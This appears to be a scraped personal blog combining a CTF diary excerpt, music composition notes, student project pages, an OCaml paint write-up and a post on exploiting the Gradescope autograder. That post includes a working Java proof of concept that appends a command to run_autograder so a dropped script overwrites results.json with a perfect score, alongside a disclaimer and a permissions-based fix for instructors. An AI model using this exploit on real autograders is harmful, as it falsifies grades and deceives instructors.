Now we define a new ABE model, such that we train the above three models at the same time. We randomly generated a plain message and a key, encrypt it using the Alice model, decrypt it using the Bob model, and we define the Alice-Bob Loss as the difference between the original message and the decrypted message. We feed that encrypted intermediate message into eve, and calculate the Eve Loss. The ABE model loss is the defined as $\text{Alice-Bob Loss} + \frac{\left(32 - \text{Eve Loss}\right)^2}{ 32^2 }$, $32$ is half the message size. Don’t know where it got the equation from, but apparently this model is a Adversarial Network, as it wants Alice-Bob Loss to be as small as possible, in the meanwhile the Eve Loss as large as possible.

Now with the above sorted out, I started to experiment with a lot of things. First, I confirmed that encryption and decryption depends heavily on the weights/training time instead of the model. Meaning if I encrypted a message with a Bob model that I trained for 5 minutes, the model that I trained for 30 minutes cannot be used to decrypt it with the correct key, and vice versa. Second, I realized that if you didn’t train the models long enough, the decryption could be broken easily. Third, even if the keys aren’t right, the entropy of the message would stay roughly the same, which means if you get the decrypted message being mostly 0x00 or 0xFF, then it is most likely that the model weights affected it, instead of the key being wrong.

So I first tried to observe the training process. For each epoch, I decrypt the first 8 bytes (message) of the given encrypted message and a random key, see when it would spit out a decrypted text that looked of right entropy. I observed for a long time but it doesn’t seem to give off any useful information.

I then though it might be possible to use the eve model to do something. I knew that eve model must already have a large enough loss for the ABE model to work, so it won’t work if I tried to use it to decrypt the entire message. However, that is under the assumption that the keys are different each time. What if the eve model could work if the decryption keys are the same, and the weights would do the magic?

In the meanwhile, my teammates were able to find some repeating messages (8-bytes) in the original html, and were able to figure out where the changes were made by comparing the location of the repeating messages in the same bunch of the plain text and the given encrypted message. They concluded that one change happened at around 12,000 bytes.

This give me much hope as I could be sure that no changed were made before 10,000 bytes, which meant I had about 1,250 training points to use. My idea was, to first use the first 16 messages to train an eve model so that it decrypts these 16 messages and consequently the first generated key stored at the 17th message. And then use the next 16 messages to train another eve model that would do the same job. After finding the keys for the first 1,250 messages, I could use these to train a Bob model that works for this dataset, and use it to decrypt the entire text.

However, someone beat me to it and got the flag. When I look at his exploit, there were NO machine learning stuff used. The exploit simply calculated some matrix and solved a linear matrix equation to get a transformation matrix between the encrypted message and the plain message. I was like, WHAT?

threefactooorx

2:30 PM

While doing smart-cryptooo, I jumped out to see what’s going on with this literally “one-and-only” web challenge. There was only a website to upload a html file, and one file to download which has an .crx extension. I realized that it must be to write a html exploit that cracks this chrome plugin. Unzipping the plugin we find two scripts, one background JS file that seemingly returns the flag, and another JS that is obfuscated. However, it really wasn’t that much of an obfuscation and with a bit of manual restoring of the strings it is pretty clear what we need to do in order for the script to print the flag for us.

There were too many other people working on this challenge, and they were all faster than me since I was late in the game. Not for too long they got the flag.

looocked-ooout

12:15 AM, after midnight

Before I went to sleep, I wanted to take a look at if there’s anything I still could do for the team. And yet another pwn. I think it might be to pwn the given cid binary, which is seemingly an mp3 loader, maybe craft a special mp3 or something. Dragged it into Ghidra, analyzed, decompiled, shook my head, and closed all the windows.

0xFF

Woke up after the event was over. Really nice to see that our team was at the third place, meaning a qualification for the finals (although I won’t be there). Also really surprised to see that there were even a time (an hour before the end) we were in the first place, although I contributed nothing to it.

After playing in such a professional, competitive, and finesse CTF event, I think that I still got a lot to learn, more specifically practicing pwn and reversing. One thing I feel okay about myself is that I can keep up with the pace, and at least I still provided some insights for my teammates in some of the questions, even though it’s my first time in a CTF. Also, the format is a jeopardy instead of attack-defense, which is another whole new area that I had absolutely no experiences in.

CTF is definitely interesting something I want to experience again. Before then, see you next time.

P.S. I have this idea where I think it might be interesting if I can come up with an easy CTF/ARG for the university students to play in, if you have the same idea, contact me!

Compositions

2020-12-14T23:45:00-05:00

Here are some of my compositions in music.

MUSC 79

Dream in Pure Data

Dream in Pure Data by SuperFashi

A 1h30m run of my pure data patch.

Retro Gameplaying as Instrument Interface

I think current instruments lack certain feedback to the performers and especially audiences. Live performances will normally have an auxiliary visual element (like laser lights synced to the music or generative visuals), which is more of an effect rather than a cause. Even for Launchpad performances, most of the time the visuals on the grid are nothing more than flashes of lights. It will be interesting, then, to perform an instrument by playing the game, or to play the game by performing the instrument, such that each interaction by the performer does not only create sounds/music, but also at the same time creates the visualization of the music (which is a gameplay meaningful by itself). This should further blur the line between sounds and visuals, and hopefully will create unique interactive feedback.

MUSC 77

Intro to Electronic Music by SuperFashi

All music were produced with a MacBook Pro and Logic Pro stock plugins and instruments.

Recorded, written, composed, programed, mixed, mastered by me.

Elevator Music

The entire track was made from a field recording of an elevator in Harrison College House. The elevator runs through 26 floors (24 floors plus the bottom level and the penthouse), thus made the natural 1+4x6+1 structure. I used the first buzz as a lead-in, then the next 4x6 as 6 different sections where there are 4 buzzes (bars) in each section, and the last one buzz as the final climax.

All sounds were derived from the original recording by routing the raw recording to different buses with different effects. No synthesizer/sampling/flex-pitch involved.

Tech, no?

The track follows the idea of a 2/4 - 3/4 - 4/4 meter change. The 2/4 meter doesn’t exist in the composition but exists as a 2-against-3 polyrhythm on the 3/4 meter. I hand-tuned some of the cymbal notes to accent downbeats and upbeats, but instead of the actual upbeat and downbeat of the meter, I accented them in different places to produce a polymeter feeling.

Only Drum Synth was used in this track for instrumentation. Automation was heavily used to adjust parameters of different Drum Synths to simulate a realistic drum playing effect.

None Shall Sleep

The track uses samples from a version of “Nessun dorma” performed by Luciano Pavarotti. The choice of sampling from opera is to deviate from the normal mindset of sampling from 70s/80s songs. Only the drum and electronic piano is not from the sample.

The sample was loaded in by Q-sampler and sample points were hand-chosen. The “fake-out intro” plays 2X speed of the sample, while the actual track uses 4X speed of the sample. The entire sample is pitch-shifted 10 semitones up.

Dark Woods

7 Retro Synths and 1 Alchemy were used for this track. Synths with different textures were introduced one by one to draw the listener’s focus to the new timbre. Automations are used for mixing while multiple Randomizer and Modulator are used for synth parameters.

An A=432Hz and 17-TET Pythagorean tuning system is used in this work. This is inspired by, of course, Wendy Carlos.

Dance

Heavily inspired by Yasutaka Nakata’s work, I wanted to make a similar work that features his signature dance pop style. I chose the classic Verse-Chorus in ABA’BCB form, with Intro and Pre-Chorus in mind, which is what he uses a lot on his productions for KPP.

Also influenced by him, the choice of transition between sections was done in a seamless manner. Subtle hints in harmony, melody and percussion were used to pace the song and push the energy into the next section.

MUSC 70

For B.G.

This is the second composition work for the course. We are asked to use simple triads in our piece, and use roman numerals with a bass note to represent them. I also added a staccato flavor and a key change in the middle just to make the piece sounds a bit more unique. The beginning interval was borrowed from Cambridge, 1963 by Jóhann Jóhannsson, which I think has a very bright feeling.

The piece was named For B.G. simply because I asked her what a good name would be and she said “why not have it for me.” (or something like that)

MuseScore

SoundCloud

Performed by Erin Busch.

Music 70 · Hanbang Wang - For B.G.

Over the Rainbow

This is the third and final composition assignment for the course. We are asked to use seventh chords in this piece and write it in a lead sheet style. I write it as a AABA format like a pop song, but so slow that it’s like a lullaby lol. The piece was named Over the Rainbow because I wrote a lot of almost-octave jumps and just reminds me of that song.

MuseScore

SoundCloud

Performed by Erin Busch.

Music 70 · Hanbang Wang - Over the Rainbow

Hacking Gradescope Autograder

2019-12-27T10:00:00-05:00

So yeah, every script-kiddie has this little dream of hacking his own school to get a perfect score.

Prologue

Gradescope is an online grading platform for schools, founded by an instructor at UC Berkeley, which has long been exposed with some security issues by guys from MIT as their final course project^[1].

Me, on the other hand, just wanna realize my dream to hack my score when things hit me hard.

Now, although the MIT guys had already done a lot, including showing that we can directly read the source code of autograder and uploads it to a remote server (details on the paper, section 5.3.2, or down below). But they failed to achieve the final step, which obviously is to change one’s score freely.

Disclaimer

Now before you continue:

The following content and all associated programming code (“this work”) are written and developed under the notion for only educational and research purposes. Using this work in an uncontrolled production environment, without the permission of the owner of the autograder, may result in breaking Gradescope’s Terms of Use, and may potentially violate your affiliation’s Code of Conduct. Under no circumstances should I be liable for any misuse of this work.

Details

First a little recap. The following is a rough flowchart of how a general Gradescope autograder works:

The line in red indicates where our code will start running. Anything before this is totally uncontrollable without having an administrate privilege (being an instructor or have control over Gradescope’s server).

It seems that we have ruled out many potential options. However, due to the nature of Gradescope’s autograder, run_autograder is executed with root permission. This means that anything that runs directly as a child process of run_autograder owns root.

Our submitted code now has the root permission, and this opens up a whole new door towards arbitrary code execution.

Exploitation

With the power of root, we can literally traverse through all the files on the server (more specifically in Docker, without a sandbox escape exploit), and upload them to a remote server controlled by the user, since we also have Internet access.

Normies would stop here and say, “well we have the test cases just study them and debug your code.” ⒻⒶⒸⓉ, but not enough. As a TA myself, I tend to write large random fuzzing tests that generate stuff no one understands. Therefore, we need the power to change the scores directly.

Direct Output

The first thing comes to mind is to directly write to the output results.json. Since the path to it is absolutely fixed (/autograder/results/results.json), and we know the format of the output by the documentation. Seems that all we need to do is to write to the file directly and that’s it.

However, take a look at the flowchart and you will realize that the results.json is written by the run_autograder after the test is finished. This means whatever we wrote to the file would get overwritten by the real autograder results.

This seems to have an easy fix. After our code writes to the file, just set the file to immutable so that the real autograder cannot overwrite it. The problem here is, Docker by default runs without LINUX_IMMUTABLE capability, so even if you set the file to be unwritable by anyone with chmod, the file still can be overwritten.

This is a no-go.

Direct Submission

Following the path on the flow chart, the next thing meets my eye is the procedure where harness.py would upload the result via an HTTP POST request. If Gradescope would automatically accept and parse the first result comes in, potentially it may ignore any following request.

Now the thing would be to send an HTTP request to the URL for submitting the result. Look into the source code of harness.py, it turns out the URL is acquired from the environment variables. Everything seems to be going well, the user code can successfully get the URL from env, but the HTTP request simply is not OK.

A deeper look into source code showed that there needs to be an authentication token in the header along with the request. Although the token is acquired from the environment variables as well, Gradescope developers actually paid attention to this little detail and delete the environment variable after it is loaded. The result is that any child process of harness.py would not be able to get that environment variable.

What a pity.

thoughts…

When writing this, it comes to me that we could spin up a fake web server that MITM the submission. We can set HOSTS for the URL to be a loopback address and make harness.py hit our fake server, change the payload, and forward it to the real remote server.

A detail needs to be taken care of is that the URL uses HTTPS protocol, meaning that we have to generate a self-signed certificate and trust it locally. I’m not quite sure how Python’s HTTP library works and should it loads the cert in time or caches it. Nonetheless, this could potentially work.

Also, there could be other methods to extract the authentication token, such as dumping the memory of the running harness.py script and do a search in it. But that could be way too hardcore for our script-kiddie oriented write-up here.

Bottleneck

We need to make sure results.json is changed after the real results are being outputted, but before the results.json is read and upload by harness.py. Look at the flowchart this does not leave us much space. This also seems to be an impossible job—results.json is written after our code finishes executing, but how could we do anything if our code is no longer running?

Naturally, we need some kind of delayed device, that would still work after our code exits. I tried cron and sleep, both of them are polling-based and need precise timing, doesn’t seem to work well in this scenario (maybe just bad luck for me).

thoughts…

When writing this, it comes to me that we can use inotify-related utilities to watch for the change of the results.json file, which turns the scenario into an interrupts-driven case. If fast enough, we may squeeze in the time between the run_autograder writes the file and harness.py reads the file to make the change.

A New Light

All hopes seem gone, although you might already notice the larger-in-size arrow in the flowchart. It is after the autograder result is written to results.json, but before run_autograder exits. it would be perfect if we can do something at this time, but how?

It can’t help but to think, can we make run_autograder do things we want it to do? At first glance, this is implausible, as run_autograder is written by the instructors and is there before our code starts running. This is true for almost all executables, since it is impossible to change the instruction of a running file (without considering some hardcore injection, that is). This is also why we can’t directly change harness.py to make it do what we want.

But run_autograder is an exception. Although in the documentation it says that run_autograder could be any type of executables files, since the examples provided by Gradescope is written as a shell script, many autograders follows the path.

What’s wrong about shell scripts? Well, shell scripts are executed line by line, which means that if we append new lines to the script before it is finished, the new line would get executed. As run_autograder also has a fixed path, it makes our life tremendously easier. What we are left to do is to append the commands we want it to execute to the end of the file, and that’s it.

The Final Payload

I decided to actually extract a python script to the /autograder/exploit.py, and then append a single line python /autograder/exploit.py to the end of run_autograder. The following is the POC code I used for a Java autograder. I also tried with a Python autograder, which works fine as well. Other autograders, as long as they are using a shell script as run_autograder file, theoretically should work as well.

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

public class Submission {
    public static void question1() {
        final String exploit = "import json\n" +
                "with open('/autograder/results/results.json', 'w') as f:\n" +
                "    f.write('{\"score\": 100.0}')";
        final Path exploitPath = Paths.get("/autograder/exploit.py");
        if (Files.notExists(exploitPath)) {
            final Path agPath = Paths.get("/autograder/run_autograder");
            try {
                Files.write(agPath, "\npython /autograder/exploit.py".getBytes(),
                        StandardOpenOption.APPEND);
                Files.write(exploitPath, exploit.getBytes(),
                        StandardOpenOption.WRITE, StandardOpenOption.CREATE);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}

This is a POC exploit that overwrites the real autograder output and set the score to 100, which assumes Submission.question() will be invoked somewhere during the tests.

Prevention

By the paper written by the MIT guys, this problem should exist back in 2016 when autograder was still in beta. Based on this I guess Gradescope developers are not going to fix it anytime soon.

Hence, the responsibility to prevent students from using this exploit to achieve perfect scores lays on the shoulder of our TAs.

The fix is rather easy:

Create a new user account, say runner, that is not in the sudoers.

(e.g. sudo adduser runner --no-create-home --disabled-password --gecos "")
Set all the files and folders with sensitive data (run_autograder, results/, source codes, etc.) to be inaccessible by other users. (e.g. chmod o= )

However, make sure that the compiled executables or bytecode files (like .class for Java and .pyc for Python), and all related files are still accessible by the other users.
Then, when running test suites, run as the user runner.

(e.g. before the line, add sudo -u runner)

And this should fix the problem.

This also prevents the student from seeing the source code. Although they could still upload the compiled files and decompile them, this should increase the difficulty a lot.

If your test suites do not need network access and stdouts, you could potentially kill them as well, so that your autograder would truly become a black box for any student-submitted code.

Epilogue

Honestly, Gradescope is lacking a lot of useful features that are considered essential for us TAs who use Gradescope for everything from homework to exams grading (like there’s even no mutually exclusive lock for grading). The situation is not any better after being acquired by TurnItIn.

If someday I’m tired of dealing with it, I’ll write a new online grading platform myself.

Penn Automate

2019-04-12T19:00:00-04:00

Main Page: pennmate.com Github Page: Penn Automate
LinkedIn Page: Penn Automate | LinkedIn

Introduction

On that special day, I missed twice the email from PennCourseNotify and PennCourseAlert for EAS-203, so I was a bit angry.

This is when the idea of Penn Automate comes up. Penn Automate stands for a series of simple apps that help Penn students automating tasks that are usually repetitive or hard for humans.

Penn Automate is usually abbreviated to Pennmate as a prefix to all apps affiliated with this project. This project is planned to be fully open-sourced on Github.

The website for this project is still under construction by the time you see this post, but it is planned to be created in the next few weeks, depends on the feedback given to the first app.

Technical Details

The server is hosted on AWS Lightsail.

The main backend is written in PHP with Nginx as webserver and MySQL as database.

Go is used for microservices, snippets, and daemons to assist with the services.

Flutter and Dart is used for writing mobile Apps. Other cross-platform frameworks such as React Native is in consideration.

Bootstrap and jQuery is the framework currently used for front-end projects.

Mobile Apps

Pennmate Notify

Github page: Pennmate Notify App

The notification by email is not stupid—it’s just slow. The process of sending emails is not concurrent; The email would take much more time to actually arrive at your inbox; Massive emails from the same address could trigger anti-spam; The message might simply won’t pop-up, or easily mixed with other of your emails.

Also, there will be privacy concerns if you give out your email and the course you want to be in at the same time. The data could be easily correlated to your individual identity and used to figure out how you planned your schedule. I heard^{[citation needed]} that PennLabs is already doing this when you fill in your course on Penn Mobile.

So now forget about all that and embrace Pennmate Notify. An app that pushed simplicity and functionality to its maximum and does nothing other than telling you the course is open at the shortest notice.

Download

Google Play: Pennmate Notify - Apps on Google Play.

This app is written in Dart and uses the Flutter framework. It is natively a cross-platform app, meaning that it can run on both iOS and Android devices.

Unfortunately, it is not possible to install an app from an unknown source on unjailbreaked iOS devices. The only way for me is to obtain a developer account from Apple, which would cost me $99/yr. im cute plz give me money

Browser Extension

Pennmate Notify

Github page: Pennmate Notify Chrome
Download: Pennmate Notify - Chrome Web Store

Free Tutoring

2019-01-22T18:40:00-05:00

Starting from Fall 2019, I work under The Tutoring Center. It is one of three offices within the Weingarten Learning Resources Center, offers Penn undergraduate students free, accessible, and convenient options to supplement their academic experience. Tutoring is available one-on-one and in groups, by appointment and walk-in.

Introduction

Free tutoring by me is now open for anyone in Penn studying computer science or related science and technology. You can ask questions over the email, or come to my room with the address and during the time said below.

I’d love to teach anything relates to or answer question about computer science, including software and hardware, PC problem and server maintenence, algorithms and debugging, programming languages and so forth.

Apart from CS, I can also teach Native Mainland Mandarin™, if that’s what you need.

I also like music, games, and Japanese anime. If you want to find a person with whom you can discuss those, you are also very welcomed.

Sending me an email with the time you want to come by at least 30 minutes before is appreciated, and I will reply if I’m free. Walk-in is also appreciated, but you simply may not find me.

Again, this whole tutoring thing is completely free!

Address and Timeslots

Spring 2019

Wednesday, 11:00 A.M. - 8:00 P.M.
Friday/Saturday, 10:00 A.M. - 10:00 P.M.
Sunday, 10:00 A.M. - 8:00 P.M.

Room 310, Van Pelt, Gregory

Fall 2019/Spring 2020

I tutor CIS 120 and CIS 160 in these semesters. For more information please refer to The Tutoring Center.

Fall 2020/Spring 2021

Temporarily stopped tutoring as remote learning is taking a toll on everyone.

Summer 2021

Contact me via email and we can do remote learning, yay!

Public Chat Server

2018-11-05T00:30:00-05:00

I just created a public server that you can all connect to using the given client hw07-client.jar.

Updated 12/15/2018: The server is off, thank you!

The server address is chat.hbang.wang, just type it in when you boot up the client.

You will join a channel All by default, and you can’t leave the channel unless you quit the client.

Due to the limitation of the parser, all nicknames and channel names can’t have spaces
(and of course other names that can’t pass isValidName).

This is also a good place for you to figure out expected behaviors of the actions.

Have fun! And if you have any other questions feel free to comment down below.

Rajivelized Paint

2018-10-27T02:50:00-04:00

GUI in OCaml?

This is the second most ridiculous thing I’ve heard since the dawn of civilization—the first is inventing Node.js.

Well, obviously they had it compile to a desktop program for a few iterations of this class before, so we had all kinds of crappy serif-typeface font with awful interface design that doesn’t even match the aesthetic of Windows® 98.

Luckily we have JavaScript now, which is capable of interpreting ANYTHING. The typeface was changed to sans-serif, and now we have a and ocaml_to_js, everything is beautiful now.

NO! The code itself is disgusting! Asking for a strict coding style while the provided code is unformatted and like a bunch of crap mixing together (a part of this attributes to the Graphics module).

It resulted in me manually reading the code and fixing a dozen of bugs, including the canvas won’t redraw unless user making an detectable movement, and the repaint function is invoked before making the change, making the canvas is always one frame behind.

Anyway, I have resolved most of the problems and updated related libraries, now we’re good to go.

Rajivelization

Original Flavor

Generate Bitmap

Unfortunately Graphics module is too incapable that we can’t put a PNG file into it. Therefore, after cutout Rajiv in Photoshop (one of the purest software in the world, $20 a month w/ student discount, instant own), I wrote a little Go program to transform the PNG file with alpha channel into a (int * int * int) option list list, where None means transparent (of course I could use some (-1, -1, -1) to represent it, tHaT’S nOt elEgaNt).

The psuedo-code is as follows:

file := open_png(png_file)
bmp := bitmap(file)

print("let rajiv : (int * int * int) option list list = [")
for j := 0...height(bmp)
  print("[")
  for i := 0...width(bmp)
    r, g, b, a := rgba(bmp[i][j])
    if a = 0 then print("None;")
    else print("Some(r,g,b);")
  print("];")
print("]")

Now create a new rajiv.ml file and put the printed code above into it, we’ve done generating the bitmap needed for the program.

First Attempt

The first attempt is done by a quick try of Graphics.plot method. The plot function simply draws a pixel with a given color at a certain location. By the way, that handsome photo of Mr. Rajiv was resized to 100x100px, so every time the program has to draw ten thousand pixels individually. Every time here means every movement including MouseMove. The following code is a simple implementation of the idea.

List.iteri (fun i l ->
  List.iteri (fun j c ->
    match c with
    | None -> ()
    | Some (r', g', b') ->
      Graphics.set_color (Graphics.rgb r' g' b');
      Graphics.plot (x - j) (y - i)
  ) l
) Rajiv.rajiv

This is clearly not a solution: the third Rajiv drawn made the whole interface stuck, and the user is impossible to make any move.

Alternative Method

Looking for alternatives in the documentation, I found an interesting method called Graphics.draw_image, which takes an Graphics.image and draws it at a position. With the hope that this would function well, I look for the function that would generate one, which is make_image. It takes a Graphics.color array array and turn it into an image. Notice that we also have Graphics.transp as a transparent color. This is exactly what we’re looking for!

Although in class we only learn list, it is easy to transfer them to array since we have Array.of_list. A list map call is enough:

Graphics.make_image (Array.of_list (
  List.map (fun l ->
    Array.of_list (
       List.map (fun c ->
         match c with
         | None -> Graphics.transp
         | Some (r', g', b') -> Graphics.rgb r' g' b'
       ) l
    )
  ) Rajiv.rajiv
))

The draw_image is way faster than plot. However, every time* the program has to turn a two-dimensional list into a 2D array, which is SUPER laggy. The image will flash every time* we make a move. This is somehow still not acceptable.

Optimization

The optimization is easy through caching. We just need to store the converted image somewhere so that we don’t have to make_image every time*. It is easier said than done though, since make_image can’t be invoked at the beginning of the runtime when Graphics module are not initialized yet.

Luckily values in OCaml are not fully immutable. We then can create a image option ref and initialize it to be ref None first. For the first time we just generate the image from bitmap during runtime, and every time* after just take from the cache, and we’re good to go. The problem then is solved, the Rajivs are drawn with extreme smooth.

Chromajiv

Rajiv needs to be colorful, just as our lives. My idea was to use color sliders as an offset of the photo’s original color, specifically $RGB_{new} = \left(RGB_{old} + RGB_{offset}\right) \mod 256$.

We can’t perform the exact optimization this time since color changes, and we only stored one image (w/ original color) for Rajiv. However, we can use a database-like structure to store a key-value pair, where key is the offset color, and value is the image with the offset color. The best thing for database is for sure a map.

OCaml provided a Map.Make function for us to make a map with custom comparable key type and generic value type. We could, of course, take key as an int tuple, but that would be less efficient. With a second look, Graphics.color is an alias of int, where the color is stored in 0xRRGGBB way. This is a classical example of bit compression. After knowing that, we can get ourselves a beautiful IntMap.

Every time* we just check whether the map have the color we want. If no, then make_image with the new offset and store it into the map; otherwise just use the cached image. Now, we have the flawless, aesthetic :heart:chromajivelization.

Implementation

module IntMap = Map.Make(struct type t = int let compare = compare end)
let rajiv_image = ref IntMap.empty

let draw_rajiv (g: gctx) (cd: color) (p: position) : unit =
  let (x, y) = ocaml_coords g p in
  let c' = Graphics.rgb cd.r cd.g cd.b in
  if not (IntMap.mem c' !rajiv_image) then
    rajiv_image := IntMap.add c' (Graphics.make_image (Array.of_list (
      List.map (fun l ->
        Array.of_list (
           List.map (fun c -> 
             match c with
             | None -> Graphics.transp
             | Some (r', g', b') ->
               Graphics.rgb ((r' + cd.r) mod 256)
                            ((g' + cd.g) mod 256)
                            ((b' + cd.b) mod 256)
           ) l
        )
      ) Rajiv.rajiv
    ))) !rajiv_image;
  Graphics.draw_image (IntMap.find c' !rajiv_image) x y

Demo

Paint!

I prefer not to publish my source code on this one. However, I managed to port the Paint JS file locally and did some alteration. Now it runs on a single page without annoying pop-up. You are free to try it out and comment down below, or ask any questions via email.

Hanbang Wang

Introduction to Go

Go 101

Resource

Schedule

Jan 13

Topic

Recommend reading

Homework

Recording

Jan 20

Topic

Recommend reading

Homework

Recording

Jan 27

Topic

Recommend reading

Homework

Recording

Feb 3

Topic

Recommend reading

Recording

Homework

Homework

Operators & Functions

Part 1

Part 2

Part 3

Part 4

Part 5

DEF CON CTF 2021

zero-is-you

Extract Game Code

Ready Player One

Shellcode Mechanism

Level File Decryption

Playing the Game

Flatline

ICE Crash

High-speed Pizza Delivery

Ten Thousands Steps

The Elegant Mantis

(Consensual) Hallucination

UpWind

Code Choreography

NetMaze

Bub and Bob

Optimization

www

The Rule

The Observation

The Turnabout

The Smoke

The Fake IP

The Accusation

The Avoidance

The Countermeasure

The Reset

The Second Reset

The End

shooow-your-shell

Preparation

Three-Byte Shellcode

Find Values that Adds Up to the Target One

Construct an ADD/PUSH ROP Chain

Phishing Strategy

Copying Homework

Countermeasure

Some Other Methods

A Repository of Shellcodes

Fuzzing

Using Existing Tools

Game Start

Unexpected Reset

Read From Stderr

Phishing Worked

To the End

Epilogue